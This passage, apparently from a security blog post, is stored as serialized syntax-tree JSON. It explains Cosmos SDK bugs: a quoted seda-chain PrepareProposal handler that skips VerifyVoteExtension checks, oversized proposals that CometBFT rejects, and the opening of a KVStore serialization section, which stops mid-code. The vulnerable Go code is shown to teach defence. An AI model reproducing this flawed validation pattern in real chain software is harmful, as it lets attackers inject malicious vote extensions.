",{"type":25,"tag":82,"props":87997,"children":87999},{"className":87998},[],[88000],{"type":31,"value":88001},"ValidateVoteExtension",{"type":31,"value":88003}," but does not verify it against the rules in ",{"type":25,"tag":82,"props":88005,"children":88007},{"className":88006},[],[88008],{"type":31,"value":88009},"VerifyVoteExtention.",{"type":31,"value":88011}," Therefore leaving the leader vulnerable to accepting malicious vote extensions in their proposals.",{"type":25,"tag":38,"props":88013,"children":88014},{},[88015],{"type":25,"tag":162,"props":88016,"children":88019},{"href":88017,"rel":88018},"https://github.com/sedaprotocol/seda-chain/blob/66c1b593fa81c7d443ab5fa82757b45e68597f49/app/abci/handlers.go#L180",[166],[88020],{"type":31,"value":80711},{"type":25,"tag":206,"props":88022,"children":88024},{"code":88023,"language":80136,"meta":7,"className":80137,"style":7},"func (h *Handlers) PrepareProposalHandler() sdk.PrepareProposalHandler {\n    return func(ctx sdk.Context, req *abcitypes.RequestPrepareProposal) (*abcitypes.ResponsePrepareProposal, error) {\n        ...\n        var injection []byte\n        if req.Height > ctx.ConsensusParams().Abci.VoteExtensionsEnableHeight && collectSigs {\n            //Fails to verify vote extensions with VerifyVoteExtension rules\n            err := baseapp.ValidateVoteExtensions(ctx, h.stakingKeeper, req.Height, ctx.ChainID(), req.LocalLastCommit)\n            if err != nil {\n                return nil, err\n            }\n            injection, err = json.Marshal(req.LocalLastCommit)\n            if err != nil {\n                h.logger.Error(\"failed to marshal extended votes\", \"err\", err)\n                return nil, err\n            }\n            ...\n        }\n        defaultRes, err := h.defaultPrepareProposal(ctx, req)\n        ...\n        proposalTxs := defaultRes.Txs\n        if injection != nil {\n            proposalTxs = append([][]byte{injection}, proposalTxs...)\n            h.logger.Debug(\"injected local last commit\", \"height\", req.Height)\n        }\n        return &abcitypes.ResponsePrepareProposal{\n            Txs: proposalTxs,\n        }, nil\n    }\n}\n",[88025],{"type":25,"tag":82,"props":88026,"children":88027},{"__ignoreMap":7},[88028,88082,88173,88180,88201,88268,88276,88380,88403,88422,88429,88483,88506,88561,88580,88587,88594,88601,88655,88662,88688,88711,88763,88825,88832,88859,88879,88891,88898],{"type":25,"tag":216,"props":88029,"children":88030},{"class":6922,"line":6923},[88031,88035,88039,88044,88048,88053,88057,88062,88066,88070,88074,88078],{"type":25,"tag":216,"props":88032,"children":88033},{"style":6936},[88034],{"type":31,"value":80272},{"type":25,"tag":216,"props":88036,"children":88037},{"style":6964},[88038],{"type":31,"value":7016},{"type":25,"tag":216,"props":88040,"children":88041},{"style":6947},[88042],{"type":31,"value":88043},"h ",{"type":25,"tag":216,"props":88045,"children":88046},{"style":6953},[88047],{"type":31,"value":8519},{"type":25,"tag":216,"props":88049,"children":88050},{"style":7375},[88051],{"type":31,"value":88052},"Handlers",{"type":25,"tag":216,"props":88054,"children":88055},{"style":6964},[88056],{"type":31,"value":7036},{"type":25,"tag":216,"props":88058,"children":88059},{"style":7047},[88060],{"type":31,"value":88061},"PrepareProposalHandler",{"type":25,"tag":216,"props":88063,"children":88064},{"style":6964},[88065],{"type":31,"value":18000},{"type":25,"tag":216,"props":88067,"children":88068},{"style":7375},[88069],{"type":31,"value":82702},{"type":25,"tag":216,"props":88071,"children":88072},{"style":6964},[88073],{"type":31,"value":179},{"type":25,"tag":216,"props":88075,"children":88076},{"style":7375},[88077],{"type":31,"value":88061},{"type":25,"tag":216,"props":88079,"children":88080},{"style":6964},[88081],{"type":31,"value":7241},{"type":25,"tag":216,"props":88083,"children":88084},{"class":6922,"line":6769},[88085,88089,88093,88097,88101,88105,88109,88113,88117,88122,88126,88131,88135,88140,88144,88148,88152,88156,88161,88165,88169],{"type":25,"tag":216,"props":88086,"children":88087},{"style":6973},[88088],{"type":31,"value":20947},{"type":25,"tag":216,"props":88090,"children":88091},{"style":6936},[88092],{"type":31,"value":83981},{"type":25,"tag":216,"props":88094,"children":88095},{"style":6964},[88096],{"type":31,"value":1850},{"type":25,"tag":216,"props":88098,"children":88099},{"style":6947},[88100],{"type":31,"value":24240},{"type":25,"tag":216,"props":88102,"children":88103},{"style":7375},[88104],{"type":31,"value":82613},{"type":25,"tag":216,"props":88106,"children":88107},{"style":6964},[88108],{"type":31,"value":179},{"type":25,"tag":216,"props":88110,"children":88111},{"style":7375},[88112],{"type":31,"value":80321},{"type":25,"tag":216,"props":88114,"children":88115},{"style":6964},[88116],{"type":31,"value":7026},{"type":25,"tag":216,"props":88118,"children":88119},{"style":6947},[88120],{"type":31,"value":88121},"req",{"type":25,"tag":216,"props":88123,"children":88124},{"style":6953},[88125],{"type":31,"value":13773},{"type":25,"tag":216,"props":88127,"children":88128},{"style":7375},[88129],{"type":31,"value":88130},"abcitypes",{"type":25,"tag":216,"props":88132,"children":88133},{"style":6964},[88134],{"type":31,"value":179},{"type":25,"tag":216,"props":88136,"children":88137},{"style":7375},[88138],{"type":31,"value":88139},"RequestPrepareProposal",{"type":25,"tag":216,"props":88141,"children":88142},{"style":6964},[88143],{"type":31,"value":80354},{"type":25,"tag":216,"props":88145,"children":88146},{"style":6953},[88147],{"type":31,"value":8519},{"type":25,"tag":216,"props":88149,"children":88150},{"style":7375},[88151],{"type":31,"value":88130},{"type":25,"tag":216,"props":88153,"children":88154},{"style":6964},[88155],{"type":31,"value":179},{"type":25,"tag":216,"props":88157,"children":88158},{"style":7375},[88159],{"type":31,"value":88160},"ResponsePrepareProposal",{"type":25,"tag":216,"props":88162,"children":88163},{"style":6964},[88164],{"type":31,"value":7026},{"type":25,"tag":216,"props":88166,"children":88167},{"style":7375},[88168],{"type":31,"value":18821},{"type":25,"tag":216,"props":88170,"children":88171},{"style":6964},[88172],{"type":31,"value":18761},{"type":25,"tag":216,"props":88174,"children":88175},{"class":6922,"line":6778},[88176],{"type":25,"tag":216,"props":88177,"children":88178},{"style":6953},[88179],{"type":31,"value":85814},{"type":25,"tag":216,"props":88181,"children":88182},{"class":6922,"line":7005},[88183,88187,88192,88196],{"type":25,"tag":216,"props":88184,"children":88185},{"style":6936},[88186],{"type":31,"value":84090},{"type":25,"tag":216,"props":88188,"children":88189},{"style":6947},[88190],{"type":31,"value":88191}," injection",{"type":25,"tag":216,"props":88193,"children":88194},{"style":6964},[88195],{"type":31,"value":80199},{"type":25,"tag":216,"props":88197,"children":88198},{"style":7375},[88199],{"type":31,"value":88200},"byte\n",{"type":25,"tag":216,"props":88202,"children":88203},{"class":6922,"line":7110},[88204,88208,88213,88217,88221,88225,88229,88233,88237,88241,88246,88250,88255,88259,88264],{"type":25,"tag":216,"props":88205,"children":88206},{"style":6973},[88207],{"type":31,"value":7222},{"type":25,"tag":216,"props":88209,"children":88210},{"style":6947},[88211],{"type":31,"value":88212}," req",{"type":25,"tag":216,"props":88214,"children":88215},{"style":6964},[88216],{"type":31,"value":179},{"type":25,"tag":216,"props":88218,"children":88219},{"style":6947},[88220],{"type":31,"value":87451},{"type":25,"tag":216,"props":88222,"children":88223},{"style":6953},[88224],{"type":31,"value":18151},{"type":25,"tag":216,"props":88226,"children":88227},{"style":6947},[88228],{"type":31,"value":29801},{"type":25,"tag":216,"props":88230,"children":88231},{"style":6964},[88232],{"type":31,"value":179},{"type":25,"tag":216,"props":88234,"children":88235},{"style":7047},[88236],{"type":31,"value":87652},{"type":25,"tag":216,"props":88238,"children":88239},{"style":6964},[88240],{"type":31,"value":34129},{"type":25,"tag":216,"props":88242,"children":88243},{"style":6947},[88244],{"type":31,"value":88245},"Abci",{"type":25,"tag":216,"props":88247,"children":88248},{"style":6964},[88249],{"type":31,"value":179},{"type":25,"tag":216,"props":88251,"children":88252},{"style":6947},[88253],{"type":31,"value":88254},"VoteExtensionsEnableHeight",{"type":25,"tag":216,"props":88256,"children":88257},{"style":6953},[88258],{"type":31,"value":18142},{"type":25,"tag":216,"props":88260,"children":88261},{"style":6947},[88262],{"type":31,"value":88263}," collectSigs",{"type":25,"tag":216,"props":88265,"children":88266},{"style":6964},[88267],{"type":31,"value":7241},{"type":25,"tag":216,"props":88269,"children":88270},{"class":6922,"line":7216},[88271],{"type":25,"tag":216,"props":88272,"children":88273},{"style":6927},[88274],{"type":31,"value":88275},"            //Fails to verify vote extensions with VerifyVoteExtension rules\n",{"type":25,"tag":216,"props":88277,"children":88278},{"class":6922,"line":7244},[88279,88283,88287,88292,88296,88301,88305,88309,88313,88317,88321,88326,88330,88334,88338,88342,88346,88350,88354,88359,88363,88367,88371,88376],{"type":25,"tag":216,"props":88280,"children":88281},{"style":6947},[88282],{"type":31,"value":86308},{"type":25,"tag":216,"props":88284,"children":88285},{"style":6953},[88286],{"type":31,"value":80388},{"type":25,"tag":216,"props":88288,"children":88289},{"style":6947},[88290],{"type":31,"value":88291}," baseapp",{"type":25,"tag":216,"props":88293,"children":88294},{"style":6964},[88295],{"type":31,"value":179},{"type":25,"tag":216,"props":88297,"children":88298},{"style":7047},[88299],{"type":31,"value":88300},"ValidateVoteExtensions",{"type":25,"tag":216,"props":88302,"children":88303},{"style":6964},[88304],{"type":31,"value":1850},{"type":25,"tag":216,"props":88306,"children":88307},{"style":6947},[88308],{"type":31,"value":24240},{"type":25,"tag":216,"props":88310,"children":88311},{"style":6964},[88312],{"type":31,"value":7026},{"type":25,"tag":216,"props":88314,"children":88315},{"style":6947},[88316],{"type":31,"value":2611},{"type":25,"tag":216,"props":88318,"children":88319},{"style":6964},[88320],{"type":31,"value":179},{"type":25,"tag":216,"props":88322,"children":88323},{"style":6947},[88324],{"type":31,"value":88325},"stakingKeeper",{"type":25,"tag":216,"props":88327,"children":88328},{"style":6964},[88329],{"type":31,"value":7026},{"type":25,"tag":216,"props":88331,"children":88332},{"style":6947},[88333],{"type":31,"value":88121},{"type":25,"tag":216,"props":88335,"children":88336},{"style":6964},[88337],{"type":31,"value":179},{"type":25,"tag":216,"props":88339,"children":88340},{"style":6947},[88341],{"type":31,"value":87451},{"type":25,"tag":216,"props":88343,"children":88344},{"style":6964},[88345],{"type":31,"value":7026},{"type":25,"tag":216,"props":88347,"children":88348},{"style":6947},[88349],{"type":31,"value":24240},{"type":25,"tag":216,"props":88351,"children":88352},{"style":6964},[88353],{"type":31,"value":179},{"type":25,"tag":216,"props":88355,"children":88356},{"style":7047},[88357],{"type":31,"value":88358},"ChainID",{"type":25,"tag":216,"props":88360,"children":88361},{"style":6964},[88362],{"type":31,"value":22334},{"type":25,"tag":216,"props":88364,"children":88365},{"style":6947},[88366],{"type":31,"value":88121},{"type":25,"tag":216,"props":88368,"children":88369},{"style":6964},[88370],{"type":31,"value":179},{"type":25,"tag":216,"props":88372,"children":88373},{"style":6947},[88374],{"type":31,"value":88375},"LocalLastCommit",{"type":25,"tag":216,"props":88377,"children":88378},{"style":6964},[88379],{"type":31,"value":7107},{"type":25,"tag":216,"props":88381,"children":88382},{"class":6922,"line":7257},[88383,88387,88391,88395,88399],{"type":25,"tag":216,"props":88384,"children":88385},{"style":6973},[88386],{"type":31,"value":62768},{"type":25,"tag":216,"props":88388,"children":88389},{"style":6947},[88390],{"type":31,"value":52490},{"type":25,"tag":216,"props":88392,"children":88393},{"style":6953},[88394],{"type":31,"value":68355},{"type":25,"tag":216,"props":88396,"children":88397},{"style":6936},[88398],{"type":31,"value":85890},{"type":25,"tag":216,"props":88400,"children":88401},{"style":6964},[88402],{"type":31,"value":7241},{"type":25,"tag":216,"props":88404,"children":88405},{"class":6922,"line":7275},[88406,88410,88414,88418],{"type":25,"tag":216,"props":88407,"children":88408},{"style":6973},[88409],{"type":31,"value":64696},{"type":25,"tag":216,"props":88411,"children":88412},{"style":6936},[88413],{"type":31,"value":85890},{"type":25,"tag":216,"props":88415,"children":88416},{"style":6964},[88417],{"type":31,"value":7026},{"type":25,"tag":216,"props":88419,"children":88420},{"style":6947},[88421],{"type":31,"value":87611},{"type":25,"tag":216,"props":88423,"children":88424},{"class":6922,"line":7296},[88425],{"type":25,"tag":216,"props":88426,"children":88427},{"style":6964},[88428],{"type":31,"value":62852},{"type":25,"tag":216,"props":88430,"children":88431},{"class":6922,"line":7305},[88432,88437,88441,88445,88449,88454,88458,88463,88467,88471,88475,88479],{"type":25,"tag":216,"props":88433,"children":88434},{"style":6947},[88435],{"type":31,"value":88436},"            injection",{"type":25,"tag":216,"props":88438,"children":88439},{"style":6964},[88440],{"type":31,"value":7026},{"type":25,"tag":216,"props":88442,"children":88443},{"style":6947},[88444],{"type":31,"value":52389},{"type":25,"tag":216,"props":88446,"children":88447},{"style":6953},[88448],{"type":31,"value":6956},{"type":25,"tag":216,"props":88450,"children":88451},{"style":6947},[88452],{"type":31,"value":88453}," json",{"type":25,"tag":216,"props":88455,"children":88456},{"style":6964},[88457],{"type":31,"value":179},{"type":25,"tag":216,"props":88459,"children":88460},{"style":7047},[88461],{"type":31,"value":88462},"Marshal",{"type":25,"tag":216,"props":88464,"children":88465},{"style":6964},[88466],{"type":31,"value":1850},{"type":25,"tag":216,"props":88468,"children":88469},{"style":6947},[88470],{"type":31,"value":88121},{"type":25,"tag":216,"props":88472,"children":88473},{"style":6964},[88474],{"type":31,"value":179},{"type":25,"tag":216,"props":88476,"children":88477},{"style":6947},[88478],{"type":31,"value":88375},{"type":25,"tag":216,"props":88480,"children":88481},{"style":6964},[88482],{"type":31,"value":7107},{"type":25,"tag":216,"props":88484,"children":88485},{"class":6922,"line":7557},[88486,88490,88494,88498,88502],{"type":25,"tag":216,"props":88487,"children":88488},{"style":6973},[88489],{"type":31,"value":62768},{"type":25,"tag":216,"props":88491,"children":88492},{"style":6947},[88493],{"type":31,"value":52490},{"type":25,"tag":216,"props":88495,"children":88496},{"style":6953},[88497],{"type":31,"value":68355},{"type":25,"tag":216,"props":88499,"children":88500},{"style":6936},[88501],{"type":31,"value":85890},{"type":25,"tag":216,"props":88503,"children":88504},{"style":6964},[88505],{"type":31,"value":7241},{"type":25,"tag":216,"props":88507,"children":88508},{"class":6922,"line":7574},[88509,88514,88518,88523,88527,88531,88535,88540,88544,88549,88553,88557],{"type":25,"tag":216,"props":88510,"children":88511},{"style":6947},[88512],{"type":31,"value":88513},"                h",{"type":25,"tag":216,"props":88515,"children":88516},{"style":6964},[88517],{"type":31,"value":179},{"type":25,"tag":216,"props":88519,"children":88520},{"style":6947},[88521],{"type":31,"value":88522},"logger",{"type":25,"tag":216,"props":88524,"children":88525},{"style":6964},[88526],{"type":31,"value":179},{"type":25,"tag":216,"props":88528,"children":88529},{"style":7047},[88530],{"type":31,"value":41361},{"type":25,"tag":216,"props":88532,"children":88533},{"style":6964},[88534],{"type":31,"value":1850},{"type":25,"tag":216,"props":88536,"children":88537},{"style":8205},[88538],{"type":31,"value":88539},"\"failed to marshal extended votes\"",{"type":25,"tag":216,"props":88541,"children":88542},{"style":6964},[88543],{"type":31,"value":7026},{"type":25,"tag":216,"props":88545,"children":88546},{"style":8205},[88547],{"type":31,"value":88548},"\"err\"",{"type":25,"tag":216,"props":88550,"children":88551},{"style":6964},[88552],{"type":31,"value":7026},{"type":25,"tag":216,"props":88554,"children":88555},{"style":6947},[88556],{"type":31,"value":52389},{"type":25,"tag":216,"props":88558,"children":88559},{"style":6964},[88560],{"type":31,"value":7107},{"type":25,"tag":216,"props":88562,"children":88563},{"class":6922,"line":7591},[88564,88568,88572,88576],{"type":25,"tag":216,"props":88565,"children":88566},{"style":6973},[88567],{"type":31,"value":64696},{"type":25,"tag":216,"props":88569,"children":88570},{"style":6936},[88571],{"type":31,"value":85890},{"type":25,"tag":216,"props":88573,"children":88574},{"style":6964},[88575],{"type":31,"value":7026},{"type":25,"tag":216,"props":88577,"children":88578},{"style":6947},[88579],{"type":31,"value":87611},{"type":25,"tag":216,"props":88581,"children":88582},{"class":6922,"line":7604},[88583],{"type":25,"tag":216,"props":88584,"children":88585},{"style":6964},[88586],{"type":31,"value":62852},{"type":25,"tag":216,"props":88588,"children":88589},{"class":6922,"line":7613},[88590],{"type":25,"tag":216,"props":88591,"children":88592},{"style":6953},[88593],{"type":31,"value":86490},{"type":25,"tag":216,"props":88595,"children":88596},{"class":6922,"line":7636},[88597],{"type":25,"tag":216,"props":88598,"children":88599},{"style":6964},[88600],{"type":31,"value":7302},{"type":25,"tag":216,"props":88602,"children":88603},{"class":6922,"line":7645},[88604,88609,88613,88617,88621,88626,88630,88635,88639,88643,88647,88651],{"type":25,"tag":216,"props":88605,"children":88606},{"style":6947},[88607],{"type":31,"value":88608},"        defaultRes",{"type":25,"tag":216,"props":88610,"children":88611},{"style":6964},[88612],{"type":31,"value":7026},{"type":25,"tag":216,"props":88614,"children":88615},{"style":6947},[88616],{"type":31,"value":52389},{"type":25,"tag":216,"props":88618,"children":88619},{"style":6953},[88620],{"type":31,"value":80388},{"type":25,"tag":216,"props":88622,"children":88623},{"style":6947},[88624],{"type":31,"value":88625}," h",{"type":25,"tag":216,"props":88627,"children":88628},{"style":6964},[88629],{"type":31,"value":179},{"type":25,"tag":216,"props":88631,"children":88632},{"style":7047},[88633],{"type":31,"value":88634},"defaultPrepareProposal",{"type":25,"tag":216,"props":88636,"children":88637},{"style":6964},[88638],{"type":31,"value":1850},{"type":25,"tag":216,"props":88640,"children":88641},{"style":6947},[88642],{"type":31,"value":24240},{"type":25,"tag":216,"props":88644,"children":88645},{"style":6964},[88646],{"type":31,"value":7026},{"type":25,"tag":216,"props":88648,"children":88649},{"style":6947},[88650],{"type":31,"value":88121},{"type":25,"tag":216,"props":88652,"children":88653},{"style":6964},[88654],{"type":31,"value":7107},{"type":25,"tag":216,"props":88656,"children":88657},{"class":6922,"line":7654},[88658],{"type":25,"tag":216,"props":88659,"children":88660},{"style":6953},[88661],{"type":31,"value":85814},{"type":25,"tag":216,"props":88663,"children":88664},{"class":6922,"line":7722},[88665,88670,88674,88679,88683],{"type":25,"tag":216,"props":88666,"children":88667},{"style":6947},[88668],{"type":31,"value":88669},"        proposalTxs",{"type":25,"tag":216,"props":88671,"children":88672},{"style":6953},[88673],{"type":31,"value":80388},{"type":25,"tag":216,"props":88675,"children":88676},{"style":6947},[88677],{"type":31,"value":88678}," defaultRes",{"type":25,"tag":216,"props":88680,"children":88681},{"style":6964},[88682],{"type":31,"value":179},{"type":25,"tag":216,"props":88684,"children":88685},{"style":6947},[88686],{"type":31,"value":88687},"Txs\n",{"type":25,"tag":216,"props":88689,"children":88690},{"class":6922,"line":7730},[88691,88695,88699,88703,88707],{"type":25,"tag":216,"props":88692,"children":88693},{"style":6973},[88694],{"type":31,"value":7222},{"type":25,"tag":216,"props":88696,"children":88697},{"style":6947},[88698],{"type":31,"value":88191},{"type":25,"tag":216,"props":88700,"children":88701},{"style":6953},[88702],{"type":31,"value":68355},{"type":25,"tag":216,"props":88704,"children":88705},{"style":6936},[88706],{"type":31,"value":85890},{"type":25,"tag":216,"props":88708,"children":88709},{"style":6964},[88710],{"type":31,"value":7241},{"type":25,"tag":216,"props":88712,"children":88713},{"class":6922,"line":7760},[88714,88719,88723,88727,88732,88737,88741,88746,88750,88755,88759],{"type":25,"tag":216,"props":88715,"children":88716},{"style":6947},[88717],{"type":31,"value":88718},"            proposalTxs",{"type":25,"tag":216,"props":88720,"children":88721},{"style":6953},[88722],{"type":31,"value":6956},{"type":25,"tag":216,"props":88724,"children":88725},{"style":7047},[88726],{"type":31,"value":81668},{"type":25,"tag":216,"props":88728,"children":88729},{"style":6964},[88730],{"type":31,"value":88731},"([][]",{"type":25,"tag":216,"props":88733,"children":88734},{"style":7375},[88735],{"type":31,"value":88736},"byte",{"type":25,"tag":216,"props":88738,"children":88739},{"style":6964},[88740],{"type":31,"value":80590},{"type":25,"tag":216,"props":88742,"children":88743},{"style":6947},[88744],{"type":31,"value":88745},"injection",{"type":25,"tag":216,"props":88747,"children":88748},{"style":6964},[88749],{"type":31,"value":80609},{"type":25,"tag":216,"props":88751,"children":88752},{"style":6947},[88753],{"type":31,"value":88754},"proposalTxs",{"type":25,"tag":216,"props":88756,"children":88757},{"style":6953},[88758],{"type":31,"value":13547},{"type":25,"tag":216,"props":88760,"children":88761},{"style":6964},[88762],{"type":31,"value":7107},{"type":25,"tag":216,"props":88764,"children":88765},{"class":6922,"line":7768},[88766,88771,88775,88779,88783,88787,88791,88796,88800,88805,88809,88813,88817,88821],{"type":25,"tag":216,"props":88767,"children":88768},{"style":6947},[88769],{"type":31,"value":88770},"            h",{"type":25,"tag":216,"props":88772,"children":88773},{"style":6964},[88774],{"type":31,"value":179},{"type":25,"tag":216,"props":88776,"children":88777},{"style":6947},[88778],{"type":31,"value":88522},{"type":25,"tag":216,"props":88780,"children":88781},{"style":6964},[88782],{"type":31,"value":179},{"type":25,"tag":216,"props":88784,"children":88785},{"style":7047},[88786],{"type":31,"value":28668},{"type":25,"tag":216,"props":88788,"children":88789},{"style":6964},[88790],{"type":31,"value":1850},{"type":25,"tag":216,"props":88792,"children":88793},{"style":8205},[88794],{"type":31,"value":88795},"\"injected local last commit\"",{"type":25,"tag":216,"props":88797,"children":88798},{"style":6964},[88799],{"type":31,"value":7026},{"type":25,"tag":216,"props":88801,"children":88802},{"style":8205},[88803],{"type":31,"value":88804},"\"height\"",{"type":25,"tag":216,"props":88806,"children":88807},{"style":6964},[88808],{"type":31,"value":7026},{"type":25,"tag":216,"props":88810,"children":88811},{"style":6947},[88812],{"type":31,"value":88121},{"type":25,"tag":216,"props":88814,"children":88815},{"style":6964},[88816],{"type":31,"value":179},{"type":25,"tag":216,"props":88818,"children":88819},{"style":6947},[88820],{"type":31,"value":87451},{"type":25,"tag":216,"props":88822,"children":88823},{"style":6964},[88824],{"type":31,"value":7107},{"type":25,"tag":216,"props":88826,"children":88827},{"class":6922,"line":7800},[88828],{"type":25,"tag":216,"props":88829,"children":88830},{"style":6964},[88831],{"type":31,"value":7302},{"type":25,"tag":216,"props":88833,"children":88834},{"class":6922,"line":7808},[88835,88839,88843,88847,88851,88855],{"type":25,"tag":216,"props":88836,"children":88837},{"style":6973},[88838],{"type":31,"value":19702},{"type":25,"tag":216,"props":88840,"children":88841},{"style":6953},[88842],{"type":31,"value":11093},{"type":25,"tag":216,"props":88844,"children":88845},{"style":7375},[88846],{"type":31,"value":88130},{"type":25,"tag":216,"props":88848,"children":88849},{"style":6964},[88850],{"type":31,"value":179},{"type":25,"tag":216,"props":88852,"children":88853},{"style":7375},[88854],{"type":31,"value":88160},{"type":25,"tag":216,"props":88856,"children":88857},{"style":6964},[88858],{"type":31,"value":14836},{"type":25,"tag":216,"props":88860,"children":88861},{"class":6922,"line":7868},[88862,88867,88871,88875],{"type":25,"tag":216,"props":88863,"children":88864},{"style":6947},[88865],{"type":31,"value":88866},"            Txs",{"type":25,"tag":216,"props":88868,"children":88869},{"style":6964},[88870],{"type":31,"value":19288},{"type":25,"tag":216,"props":88872,"children":88873},{"style":6947},[88874],{"type":31,"value":88754},{"type":25,"tag":216,"props":88876,"children":88877},{"style":6964},[88878],{"type":31,"value":7465},{"type":25,"tag":216,"props":88880,"children":88881},{"class":6922,"line":13001},[88882,88887],{"type":25,"tag":216,"props":88883,"children":88884},{"style":6964},[88885],{"type":31,"value":88886},"        }, ",{"type":25,"tag":216,"props":88888,"children":88889},{"style":6936},[88890],{"type":31,"value":80614},{"type":25,"tag":216,"props":88892,"children":88893},{"class":6922,"line":13019},[88894],{"type":25,"tag":216,"props":88895,"children":88896},{"style":6964},[88897],{"type":31,"value":7311},{"type":25,"tag":216,"props":88899,"children":88900},{"class":6922,"line":13064},[88901],{"type":25,"tag":216,"props":88902,"children":88903},{"style":6964},[88904],{"type":31,"value":7874},{"type":25,"tag":38,"props":88906,"children":88907},{},[88908,88910,88915,88916,88921,88923,88930],{"type":31,"value":88909},"Aside from the more complex variant, pure validation mismatches are also still prevalent despite being a well-known attack surface. This stems from ",{"type":25,"tag":82,"props":88911,"children":88913},{"className":88912},[],[88914],{"type":31,"value":87280},{"type":31,"value":7016},{"type":25,"tag":82,"props":88917,"children":88919},{"className":88918},[],[88920],{"type":31,"value":87348},{"type":31,"value":88922},") rejections by various obscure checks hidden within CometBTF. For example, this commit fixes a bug where ",{"type":25,"tag":162,"props":88924,"children":88927},{"href":88925,"rel":88926},"https://github.com/babylonlabs-io/babylon/commit/aa827f875a16ebf85efee5d9a6c8c4e76dbfb7bd#diff-77659089b31367690393a968f4bfacfd1bf960ed300965729df216a6fb612699",[166],[88928],{"type":31,"value":88929},"PrepareProposal may return a Proposal larger than MaxTxBytes",{"type":31,"value":88931},", which will later get rejected by CometBTF.",{"type":25,"tag":26,"props":88933,"children":88935},{"id":88934},"the-keymaker",[88936],{"type":31,"value":88937},"The Keymaker",{"type":25,"tag":38,"props":88939,"children":88940},{},[88941,88943,88949,88951,88956],{"type":31,"value":88942},"States (persistent storage) are another crucial component in state machines. Cosmos relies on a custom key-value storage called",{"type":25,"tag":82,"props":88944,"children":88946},{"className":88945},[],[88947],{"type":31,"value":88948},"KVStore",{"type":31,"value":88950}," to handle states efficently. In ",{"type":25,"tag":82,"props":88952,"children":88954},{"className":88953},[],[88955],{"type":31,"value":88948},{"type":31,"value":88957},", keys and values are both represented as simple byte slices, requiring developers to handle serialization and deserialization of more intricate structures when working with storage.",{"type":25,"tag":38,"props":88959,"children":88960},{},[88961],{"type":31,"value":88962},"The complexity behind proper data serialization often results in flawed code and security vulnerabilities. Below, we showcase relatively simple (but buggy) implementations and progressively address and mitigate the issues until the code is deemed safe from exploits.",{"type":25,"tag":38,"props":88964,"children":88965},{},[88966,88968,88974],{"type":31,"value":88967},"Let's start by considering a scenario where we need to store the ",{"type":25,"tag":82,"props":88969,"children":88971},{"className":88970},[],[88972],{"type":31,"value":88973},"positionMap",{"type":31,"value":88975}," structure mentioned below into storage.",{"type":25,"tag":206,"props":88977,"children":88979},{"code":88978,"language":80136,"meta":7,"className":80137,"style":7},"type VaultId uint64\ntype Username string\ntype PositionName string\ntype Position struct {\n    data []byte\n}\ntype PositionMap :=\n    map[VaultId]map[Username]map[PositionName]Position\n",[88980],{"type":25,"tag":82,"props":88981,"children":88982},{"__ignoreMap":7},[88983,88999,89016,89032,89051,89066,89073,89090],{"type":25,"tag":216,"props":88984,"children":88985},{"class":6922,"line":6923},[88986,88990,88995],{"type":25,"tag":216,"props":88987,"children":88988},{"style":6936},[88989],{"type":31,"value":36719},{"type":25,"tag":216,"props":88991,"children":88992},{"style":7375},[88993],{"type":31,"value":88994}," VaultId",{"type":25,"tag":216,"props":88996,"children":88997},{"style":7375},[88998],{"type":31,"value":80174},{"type":25,"tag":216,"props":89000,"children":89001},{"class":6922,"line":6769},[89002,89006,89011],{"type":25,"tag":216,"props":89003,"children":89004},{"style":6936},[89005],{"type":31,"value":36719},{"type":25,"tag":216,"props":89007,"children":89008},{"style":7375},[89009],{"type":31,"value":89010}," Username",{"type":25,"tag":216,"props":89012,"children":89013},{"style":7375},[89014],{"type":31,"value":89015}," string\n",{"type":25,"tag":216,"props":89017,"children":89018},{"class":6922,"line":6778},[89019,89023,89028],{"type":25,"tag":216,"props":89020,"children":89021},{"style":6936},[89022],{"type":31,"value":36719},{"type":25,"tag":216,"props":89024,"children":89025},{"style":7375},[89026],{"type":31,"value":89027}," PositionName",{"type":25,"tag":216,"props":89029,"children":89030},{"style":7375},[89031],{"type":31,"value":89015},{"type":25,"tag":216,"props":89033,"children":89034},{"class":6922,"line":7005},[89035,89039,89043,89047],{"type":25,"tag":216,"props":89036,"children":89037},{"style":6936},[89038],{"type":31,"value":36719},{"type":25,"tag":216,"props":89040,"children":89041},{"style":7375},[89042],{"type":31,"value":11376},{"type":25,"tag":216,"props":89044,"children":89045},{"style":6936},[89046],{"type":31,"value":25111},{"type":25,"tag":216,"props":89048,"children":89049},{"style":6964},[89050],{"type":31,"value":7241},{"type":25,"tag":216,"props":89052,"children":89053},{"class":6922,"line":7110},[89054,89058,89062],{"type":25,"tag":216,"props":89055,"children":89056},{"style":6947},[89057],{"type":31,"value":47197},{"type":25,"tag":216,"props":89059,"children":89060},{"style":6964},[89061],{"type":31,"value":80199},{"type":25,"tag":216,"props":89063,"children":89064},{"style":7375},[89065],{"type":31,"value":88200},{"type":25,"tag":216,"props":89067,"children":89068},{"class":6922,"line":7216},[89069],{"type":25,"tag":216,"props":89070,"children":89071},{"style":6964},[89072],{"type":31,"value":7874},{"type":25,"tag":216,"props":89074,"children":89075},{"class":6922,"line":7244},[89076,89080,89085],{"type":25,"tag":216,"props":89077,"children":89078},{"style":6936},[89079],{"type":31,"value":36719},{"type":25,"tag":216,"props":89081,"children":89082},{"style":7375},[89083],{"type":31,"value":89084}," PositionMap",{"type":25,"tag":216,"props":89086,"children":89087},{"style":6953},[89088],{"type":31,"value":89089}," :=\n",{"type":25,"tag":216,"props":89091,"children":89092},{"class":6922,"line":7257},[89093,89098,89102,89107,89111,89115,89119,89124,89128,89132,89136,89141,89145],{"type":25,"tag":216,"props":89094,"children":89095},{"style":6936},[89096],{"type":31,"value":89097},"    